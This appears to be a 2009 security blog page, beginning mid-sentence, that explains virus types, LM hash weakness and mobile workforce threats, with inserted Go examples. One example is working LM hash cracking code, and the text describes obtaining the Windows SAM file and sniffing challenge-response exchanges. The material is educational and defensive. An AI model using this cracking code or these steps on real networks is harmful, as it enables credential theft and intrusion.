Friday, August 14, 2009
Brief Virus Introduction
But that 53% also includes viruses and worms that get attached to our systems through human error. So, whatever the exact figure, every computer user should at least know the basics of viruses and worms and how to keep such things off the system.
What is a Virus?
A virus is self-replicating code: it reproduces by attaching copies of itself to other executable code and runs without the knowledge or consent of the computer user.
The first viruses appeared in the early 1980s. Viruses require human activity such as booting from an infected disk, letting a CD autorun, or opening an email attachment. There are three basic ways viruses have propagated through the computer world:
* Boot sector / master boot record virus: the original method of attack. It infects the boot sector of floppy disks or the master boot record of the hard drive, so the virus runs before the operating system does. This was effective in the days when everyone passed around floppy disks.
* File (program) virus: a slightly newer form that relies on the user to execute an infected file, typically one with an extension such as .com or .exe. Some form of social engineering is normally used to get the user to run it: renaming the program, or masking the .exe extension so the file appears to be a graphic (a double extension such as photo.bmp.exe is the classic trick).
* Macro virus: the most modern type, appearing in the 1990s. Macro viruses abuse the scripting services built into applications such as Word and Excel, so merely opening a document is enough to run them. Melissa (1999) is the prime example of a macro infector; the better-remembered I Love You (2000) was the same idea carried to Windows Script Host, a VBScript attachment rather than a document macro.
A virus must place its code somewhere in the host file. Overwriting viruses simply destroy part of the host, which is noticed quickly. Most virus writers want to avoid detection for as long as possible, so they leave the host intact and add their code at the beginning of the file (prependers) or at the end (appenders), or at both ends, and redirect execution so that the viral code runs first and then hands control back to the original program.
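To make the prepender/appender distinction concrete, here is an added Go example (not code from the original post). It builds toy "infected" images from a constructed host image and a constructed marker string standing in for viral code, then shows what a signature check can and cannot do: a marker at the head or tail of the file can be stripped to recover the host, whereas a marker that landed in the middle (an overwriting or cavity infection) cannot be removed safely by this check. All byte strings are made up for the demonstration.

```go
package main

import (
	"bytes"
	"fmt"
)

// Constructed stand-ins for the demonstration: a host program image and the
// bytes a fictional virus adds to it. Neither is real executable code.
var (
	hostImage = []byte("MZ\x90\x00 original program body, left intact by the virus ")
	viralBody = []byte("<<VIRAL-CODE-MARKER>>")
)

// Prepend models a prepender: viral code first, then the untouched host.
func Prepend(host, viral []byte) []byte {
	return append(append([]byte{}, viral...), host...)
}

// Append models an appender: the untouched host first, then the viral code.
func Append(host, viral []byte) []byte {
	return append(append([]byte{}, host...), viral...)
}

// Overwrite models an overwriting virus: bytes in the middle of the host are
// replaced, so the original program is damaged and cannot be rebuilt.
func Overwrite(host, viral []byte) []byte {
	out := append([]byte{}, host...)
	copy(out[8:], viral)
	return out
}

// Classify locates a known viral marker in an image and, where the host was
// left intact, returns the recovered host bytes. For an overwriting or cavity
// infection the marker sits inside the host and nothing can be stripped.
func Classify(image, sig []byte) (kind string, host []byte, recoverable bool) {
	head := bytes.HasPrefix(image, sig)
	tail := bytes.HasSuffix(image, sig)
	switch {
	case head && tail && len(image) >= 2*len(sig):
		return "prepend+append", image[len(sig) : len(image)-len(sig)], true
	case head:
		return "prepender", image[len(sig):], true
	case tail:
		return "appender", image[:len(image)-len(sig)], true
	case bytes.Contains(image, sig):
		return "overwrite-or-cavity", nil, false
	}
	return "clean", image, true
}

func main() {
	for _, img := range [][]byte{
		Prepend(hostImage, viralBody),
		Append(hostImage, viralBody),
		Overwrite(hostImage, viralBody),
		hostImage,
	} {
		kind, host, ok := Classify(img, viralBody)
		fmt.Printf("%-20s recoverable=%v host intact=%v\n", kind, ok, bytes.Equal(host, hostImage))
	}
}
```

The head/tail check is exactly why prependers and appenders are the easiest infections to clean and why the cavity and stealth techniques listed further down exist: the first hides the marker inside the host, the second lies about the file contents when a scanner reads them.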
Component/Working of a Virus:
A virus is built from three routines (a worm, which spreads without human intervention, has the same basic structure):
-> Search routine: locates new files, disk space, or memory to infect.
-> Infection routine: copies the virus and attaches it to a suitable host.
-> Trigger routine: launches the payload when a condition is met, typically a given date and time, an infection counter, or a specific user action.
Characteristics of Virus
* A resident virus stays in memory after its host has run and infects files as they are accessed; a non-resident virus does its work while the host runs and then exits with it.
* It replicates itself.
* It may change its own code (polymorphism) or hide inside other programs to disguise its identity.
Reason for the creation of Viruses:
* Research or proof of concept
* Pranks on friends and foes
* Deliberately harming other people's computers, i.e. vandalism
* Holding a company's data hostage for money or leverage, i.e. extortion
* Keeping an eye on people, say in a computer lab or on a product's distribution, i.e. spyware
* Stealing identities over the internet and misusing them to threaten and intimidate people, and many other reasons.
Symptoms that the computer is infected
* The system behaves erratically
* Processes take longer than expected
* The floppy or optical drive opens by itself
* The machine hangs at startup
* The computer name changes
* Drive names change
* Firefox or other browsers stop working properly
* Sudden restarts, or freezes shortly after a warning appears
* Your contacts receive vulgar messages you never sent, and so on.
Basic Difference between Virus and worm:
* A worm is a special kind of self-replicating program that consumes memory and bandwidth but does not attach itself to other programs the way a virus does.
* A worm spreads across the network automatically; a virus needs a user to run the infected host.
Types of Viruses:
* By what they infect
Boot virus: infects disk boot sectors and master boot records.
File virus: infects executable files in the operating system's file system.
Macro virus: infects documents and spreadsheets such as Word and Excel files.
Network virus: spreads by email or by using the commands and protocols of the network itself.
Source code virus: inserts its own (Trojan) code into program source files so that the compiled program carries it.
* By how they infect
Parasitic virus: attaches itself to executable files and replicates from there.
Memory-resident virus: stays in main memory and infects other files from there.
Stealth virus: hides its presence from anti-virus programs, for example by intercepting file reads and returning the clean contents.
Polymorphic virus: mutates its own code on each infection so that no fixed signature matches it.
Cavity virus: writes itself into unused (typically null-filled) space inside the host file, so the file keeps its size and functionality.
Famous Viruses and Worms:
I Love You: a VBScript email worm for Windows
Melissa: a Microsoft Word macro virus
JS.spth: a JavaScript internet worm that spreads through e-mail, P2P networks etc.
Klez: an email worm whose attachment ran automatically when the message was previewed in Outlook (it abused an Internet Explorer MIME-handling flaw) and which used its own SMTP engine to mail itself onward
Slammer/Sapphire: the fastest worm in history; it fit in a single UDP packet aimed at SQL Server, and the infected population doubled roughly every 8.5 seconds.
Other well-known families:
Detnat, Netsky, Mytob, Bagle, Mywife, Virut, Zafi, Mydoom, Lovgate and Bagz.
Always remember that prevention is better than cure: don't accept strange files, don't double-click on everything, check a file's real extension, and learn a little about what batch files and scripts can do.
Install a good antivirus (NOD32, AVG, McAfee, BitDefender, Kaspersky etc.), keep it updated, scan the whole system regularly, and get into the habit of checking which processes are running.
For more information check Wikipedia, howstuffworks.com and the EC-Council CEH guide, and don't forget to google for the latest news on this topic. This was just an introduction!
How to crack a corporate network in 60 seconds!
Let's look at the fastest way this can be accomplished...
The best way to attack a Windows network is to get hold of the Windows SAM file. The SAM holds the username, the user's relative ID (the RID, the last component of the SID) and the hashed passwords for all local users. Once you have a copy, you can feed it to tools such as L0phtCrack and Cain & Abel. Brute-forcing with these tools can take on the order of eight hours. Not sixty seconds, but sufficient for most needs.
I have to keep my promise of telling you how to do it in sixty seconds, though. To understand how, you need to know a little about how the SAM file is protected. The weak link is the LAN Manager (LM) hash, which is based on the DES algorithm. A 16-byte hash (32 hex characters) is generated from the password as follows:
- Convert the password to uppercase
- Truncate the password to 14 characters; if shorter, pad it with null bytes
- Split the password into two 7-character halves and use each half as a DES key to encrypt the fixed string "KGS!@#$%", giving two 8-byte results
- Concatenate the two 8-byte results to form the 16-byte hash
Because the halves are hashed independently and case is thrown away, an attacker never faces more than 7 case-insensitive characters at a time, and a password of 7 characters or fewer has a constant, instantly recognisable second half.
To make the problem space even smaller, there are two approaches. The first is dictionary-based: weak passwords are any dictionary word or lame permutation of one, such as "password9". Since the vast majority of users use real words rather than random character sequences, precomputed hashes of the dictionary can simply be compared against the stolen hash. Secondly, if you are on a non-switched (hubbed) network, a clever individual can use NetMon or any other sniffer to capture the LM/NTLM challenge-response exchanges off the wire and crack those offline.
Using this technique on a Pentium 4 3.2 GHz machine (I have a Gateway), it takes 10 seconds to load the dictionary into memory but less than one second to actually crack the password. Subsequent runs will also take less than one second!
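The following Go program is an added example, not code from the original post, that implements the LM hash exactly as described above using the standard library's DES and then mounts the dictionary attack: it precomputes the DES output for every 7-byte half in a constructed wordlist and cracks a captured hash half by half. The wordlist and sample passwords are made up for the demonstration; the two reference values in the comments (the hash of the empty password and of "password") are the well-known LM test vectors.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"strings"
)

// lmMagic is the fixed plaintext every LM hash encrypts.
var lmMagic = []byte("KGS!@#$%")

// desKeyFrom7 spreads 7 password bytes over the 8 DES key bytes (7 key bits
// per byte; the low bit is the DES parity position, which Go's DES ignores).
func desKeyFrom7(k7 []byte) []byte {
	return []byte{
		k7[0] & 0xFE,
		(k7[0]<<7 | k7[1]>>1) & 0xFE,
		(k7[1]<<6 | k7[2]>>2) & 0xFE,
		(k7[2]<<5 | k7[3]>>3) & 0xFE,
		(k7[3]<<4 | k7[4]>>4) & 0xFE,
		(k7[4]<<3 | k7[5]>>5) & 0xFE,
		(k7[5]<<2 | k7[6]>>6) & 0xFE,
		(k7[6] << 1) & 0xFE,
	}
}

// lmHalf encrypts the magic constant under one 7-byte half of the password.
func lmHalf(k7 []byte) []byte {
	block, err := des.NewCipher(desKeyFrom7(k7))
	if err != nil {
		panic(err) // only possible with a wrong key length
	}
	out := make([]byte, 8)
	block.Encrypt(out, lmMagic)
	return out
}

// padded14 applies the uppercase / truncate / null-pad steps (ASCII assumed).
func padded14(password string) []byte {
	p := strings.ToUpper(password)
	if len(p) > 14 {
		p = p[:14]
	}
	buf := make([]byte, 14)
	copy(buf, p)
	return buf
}

// LMHash returns the 16-byte LM hash as 32 hex characters.
// LMHash("") is aad3b435b51404eeaad3b435b51404ee; LMHash("password") is
// e52cac67419a9a224a3b108f3fa6cb6d.
func LMHash(password string) string {
	buf := padded14(password)
	return hex.EncodeToString(lmHalf(buf[:7])) + hex.EncodeToString(lmHalf(buf[7:]))
}

// HalfTable precomputes the DES output of every 7-byte half in a wordlist.
// Because the halves are independent, a captured hash is cracked half by half
// and the 14-character limit collapses into two 7-character problems.
func HalfTable(words []string) map[string]string {
	t := make(map[string]string)
	for _, w := range words {
		buf := padded14(w)
		for _, half := range [][]byte{buf[:7], buf[7:]} {
			t[hex.EncodeToString(lmHalf(half))] = strings.TrimRight(string(half), "\x00")
		}
	}
	return t
}

// CrackLM looks both halves of a 32-hex-character LM hash up in the table and
// returns the recovered (uppercase) password when both halves are known.
func CrackLM(lmHex string, table map[string]string) (string, bool) {
	a, okA := table[lmHex[:16]]
	b, okB := table[lmHex[16:]]
	return a + b, okA && okB
}

func main() {
	// Constructed wordlist and sample passwords for the demonstration.
	table := HalfTable([]string{"password", "letmein", "welcome1", "secret"})
	for _, pw := range []string{"password", "Welcome1", "secret", "Tr0ub4dor&3"} {
		h := LMHash(pw)
		got, ok := CrackLM(h, table)
		fmt.Printf("%-12s %s cracked=%v -> %q\n", pw, h, ok, got)
	}
}
```

Note that "Welcome1" cracks even though only the lowercase form is in the wordlist, and that "secret" is betrayed by its constant second half before any lookup happens. The table is built once and reused, which is where the author's "subsequent runs take less than one second" comes from.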
If you want to make it more difficult to perform this type of attack on your network, please see the following Microsoft Knowledge Base articles.
- Local Security Policy - 147706
- Disabling LM hash storage - 299656
- Group policy enforcement of strong passwords - 225230
Strictly for knowledge purpose only
The Ethical Hacker Network - Step-By-Step Hacking
Everyone talks about the ability to hack computers via wireless technology, but have you ever actually SEEN someone do it? Well, you're about to. The Step-By-Step Hacking Video shows exactly how a laptop without the proper security protection can be attacked and exploited. In a matter of mere minutes, we can own an unprotected or out-of-date system. The video shows the exact procedures a hacker could use to gain access to a mobile system and eventually a corporate network. Steps and technologies to prevent such an attack are presented throughout the video and are the focus of this article. NOTE: While it may seem that the first few minutes of the video are unexciting, just wait; you are being set up!
This article is broken up into two sections. The first section quantifies the different threats to which mobile computer systems are susceptible. The second portion defines the fundamental methodological steps that hackers take in trying to exploit computer systems directly and details how each step could be thwarted. These fundamental steps are also used in the video.
Today's mobile workforce poses significant security challenges to corporations. With workers accessing corporate resources from public wi-fi hotspots, hotels, home wi-fi and broadband networks, etc., a comprehensive mobile workforce security solution has become a necessity. This is an extraordinary challenge considering that the mobile workforce is a moving target and that security budgets and personnel are constantly being downsized.
To implement an ideal mobile workforce solution, it is important to understand the actual threats. These threats fall into three main categories:
Malware
Most consumers think of viruses when it comes to malware and believe that an antivirus software solution will address all malware threats. Those of us in the industry realize that it is much more complex. For antivirus solutions to be effective, they need to be running and the virus definitions need to be up-to-date. This can be a significant challenge with a mobile workforce that is not always online when automatic updates are performed. To protect yourself from malware, please consider the following:
- In addition to antivirus software, antispyware applications are necessary to address the malware threat. Keeping these applications running and up-to-date poses the same difficulty as antivirus updates.
- Another important tool to combat malware is an enterprise-grade personal firewall with IDS/IPS capability. This matters because antivirus and antispyware applications are reactive and depend on recent definition files, whereas a firewall with IDS/IPS capability can offer a measure of zero-day protection by identifying and stopping malicious behaviour as it occurs.
- An often-overlooked way to reduce the risk from malware is ensuring that remote endpoints have the latest operating system and application security patches and are properly configured from a security perspective. Malware often takes advantage of system and application vulnerabilities that would not be present if the system were fully patched and properly configured.
- There is also a significant risk that malware will disable the antivirus and personal firewall applications that corporations put in place. Consequently, a check must confirm that these applications are running and up-to-date, and if they are not, access to the Internet, the corporate network, etc. should be denied until the deficiency is remediated. The logic for such checking and remediation should reside on the remote endpoint, as today's systems need to be in compliance with security policies at all times. In the past, corporations have relied on VPN concentrators or Cisco NAC-type functionality to check the security posture of the remote endpoint as it gains access to the corporate network. With today's mobile workers spending 80% of their time not VPN'd into a corporate network, checking the security posture only at that moment is inadequate.
Sniffing
A mobile worker constantly has the threat of their data being sniffed. Sniffing can fall into two fundamental categories:
- Sniffing of Credentials: Corporations are moving to a model where a single application provides dial-in, wi-fi, broadband, mobile data (CDMA, EVDO, etc.) access. There is an advantage to having authentication for all of these transports proxied back to a central location, commonly the corporation's network. Often these credentials are the remote user's network credentials, or other credentials of significant value to the end-user and the corporation, so it is very important that they are protected during the proxy process. With standard RFC-compliant RADIUS (a commonly used authentication protocol) the User-Name is always sent in the clear, and the User-Password is not hashed at all: it is only obfuscated by XOR with an MD5-derived keystream keyed on the shared secret, which every RADIUS proxy along the path undoes with its own secret, sees in cleartext, and re-applies for the next hop.
- Sniffing of Data: With workers using public and private wi-fi and hotel broadband Internet access, the threat of an unwanted party sniffing application traffic is very real. In virtually all cases, public wi-fi and hotel broadband networks offer no inherent encryption for data leaving a system, while making the same network available to many simultaneous users. The best protection is a VPN tunnel that stays active for the life of the public wi-fi or hotel broadband connection. Doing this and disabling split-tunneling ensures that all data leaving the remote system is encrypted by the VPN client, which commonly uses 3DES or AES (single DES, still offered by some clients, has a 56-bit key and is no longer considered adequate).
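To show why the credentials concern above is real, here is an added Go example (not from the original article) that implements the RFC 2865 User-Password hiding scheme and then plays the role of a RADIUS proxy. The shared secrets, the password and the Request Authenticator are constructed values; in a real exchange the authenticator is 16 random bytes chosen by the NAS, and this example assumes the proxy forwards the same authenticator to the next hop, which is the common case.

```go
package main

import (
	"bytes"
	"crypto/md5"
	"fmt"
)

// demoAuthenticator stands in for the 16 random bytes a NAS puts in the
// Request Authenticator field; it is a fixed, constructed value here.
var demoAuthenticator = []byte("0123456789abcdef")

// keystreamBlock is MD5(shared secret || previous 16-byte block), the value
// RFC 2865 XORs against each 16-byte chunk of the null-padded password.
func keystreamBlock(secret, prev []byte) [16]byte {
	return md5.Sum(append(append([]byte{}, secret...), prev...))
}

// HideUserPassword encodes a cleartext password into the User-Password
// attribute value: null-pad to a multiple of 16, then chain-XOR with MD5 blocks.
func HideUserPassword(secret, authenticator, password []byte) []byte {
	n := (len(password) + 15) / 16 * 16
	if n == 0 {
		n = 16
	}
	padded := make([]byte, n)
	copy(padded, password)
	out := make([]byte, n)
	prev := authenticator
	for i := 0; i < n; i += 16 {
		b := keystreamBlock(secret, prev)
		for j := 0; j < 16; j++ {
			out[i+j] = padded[i+j] ^ b[j]
		}
		prev = out[i : i+16]
	}
	return out
}

// RevealUserPassword is the exact inverse. There is no one-way hash here: any
// party holding the shared secret for a hop gets the cleartext back.
func RevealUserPassword(secret, authenticator, hidden []byte) []byte {
	out := make([]byte, len(hidden))
	prev := authenticator
	for i := 0; i+16 <= len(hidden); i += 16 {
		b := keystreamBlock(secret, prev)
		for j := 0; j < 16; j++ {
			out[i+j] = hidden[i+j] ^ b[j]
		}
		prev = hidden[i : i+16]
	}
	return bytes.TrimRight(out, "\x00")
}

// RelayThroughProxy does what every RADIUS proxy in a chain must do: recover
// the password with the secret shared with the previous hop and re-hide it
// with the secret shared with the next hop. It returns the cleartext the proxy
// saw along the way. (Assumption: the same Request Authenticator is forwarded.)
func RelayThroughProxy(secretIn, secretOut, authenticator, hidden []byte) (seen, forwarded []byte) {
	seen = RevealUserPassword(secretIn, authenticator, hidden)
	forwarded = HideUserPassword(secretOut, authenticator, seen)
	return seen, forwarded
}

func main() {
	nasSecret, homeSecret := []byte("nas-shared-secret"), []byte("home-shared-secret")
	fromNAS := HideUserPassword(nasSecret, demoAuthenticator, []byte("Sup3rSecret!"))
	seen, toHome := RelayThroughProxy(nasSecret, homeSecret, demoAuthenticator, fromNAS)
	atHome := RevealUserPassword(homeSecret, demoAuthenticator, toHome)
	fmt.Printf("on the wire from NAS : %x\nproxy recovered      : %q\nhome server recovered: %q\n", fromNAS, seen, atHome)
}
```

Two things follow directly from the code: the hop-by-hop shared secret is the only protection on the wire, so a weak secret or a compromised proxy exposes every password that passes through, and the user's actual password exists in cleartext inside each proxy for a moment. Tunnelling RADIUS over IPsec or TLS, or using an EAP method that never sends the password, removes that exposure.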
Direct Attack
The most dangerous form of attack is a direct attack, because a hacker can apply judgement to exploit a remote system, leave it vulnerable for the future, and deliberately dissect and analyze the data on it. There are a number of key security steps to implement to protect against a direct attack:
- Remote systems need to be up-to-date with security patches and properly configured. Hackers gain direct access to remote endpoints by running exploits that take advantage of vulnerabilities that would not be present if the system were properly patched and configured. Ensuring a mobile workforce has the latest patches and is properly configured is one of the biggest security challenges to organizations. Virtually all of the patching systems in place today provide no means to remediate the remote system by actually pushing the necessary patch or configuration when the endpoint is not connected directly to or VPN'd into the corporate network. With end-users spending 80% of their online time not VPN'd into the corporate network, that leaves a significant gap.
- Ensuring the remote endpoint has an enterprise-grade personal firewall that is running, properly configured and up-to-date. This firewall would not only prohibit a hacker from accessing the remote system, it would also provide stealth capabilities to help make the endpoint invisible to scans.
- Being purposely redundant, antivirus and antispyware applications need to be running and up-to-date. An outdated security application will not protect against newly developed malware. Commonly, a hacker will place malware on a victim's machine either to further exploit it or to provide a means to exploit it in the future. An endpoint that constantly scans for such malware can detect when this takes place and take the necessary action.
Step-by-Step Guide to the Fundamental Steps Performed in the Video and How to Combat Them
Footprinting and Scanning
The first step is finding a live system. There are many tools available on the Internet to search for live targets. To protect against footprinting and scanning, use an enterprise-grade personal firewall that is properly configured and running; this is the best way to keep your mobile systems from even being seen during a scan.
Enumeration
Once a target is found, more information needs to be gathered to determine the best approach for exploiting it. Just as there are many scanning tools available free on the Internet, there are many enumeration tools available. There are two main steps that should be implemented to prevent enumeration from taking place:
- Ensuring that a properly configured enterprise-grade firewall is present and operational.
- Ensuring that the remote operating system is properly configured, so that it does not disclose this type of information.
Launching an Attack
Once a live system is found and information is gathered about it, a direct attack can be launched against the system. There are a number of steps that can be taken to prevent a direct attack:
- Ensuring your remote systems have the latest operating system and application security patches. When hackers launch an attack against a system they use exploits that take advantage of vulnerabilities that commonly would not be present if the remote system were up-to-date with security patches.
- Ensuring that a properly configured enterprise-grade firewall is present and operational.
- Ensuring that antivirus and antispyware are running, use real-time scanning, and are up-to-date on your remote systems. It is a common tactic for hackers to place trojans and other malware on hacked systems; real-time scanning helps catch the moment such malware is transferred to the machine.
Leaving the Remote System Vulnerable to an Attack
Once a hacker has exploited the system, they will commonly take steps to leave it vulnerable to future attacks. This can be done by installing a trojan or remote control software, installing a key logger that routinely sends all keystrokes from the system, etc. To protect against this step:
- Ensuring an enterprise-grade personal firewall is running, properly configured and up-to-date. This can stop a remote connection from taking place and sense when malicious activities are under way.
- Ensuring that antispyware and antivirus applications are running and up-to-date. In doing so, these security applications can find and address malware left behind to further exploit the system.
I hope this helps shed light on the hacking process and has given you ample information to help you protect your own corporate networks including those ever slippery mobile workforce machines.

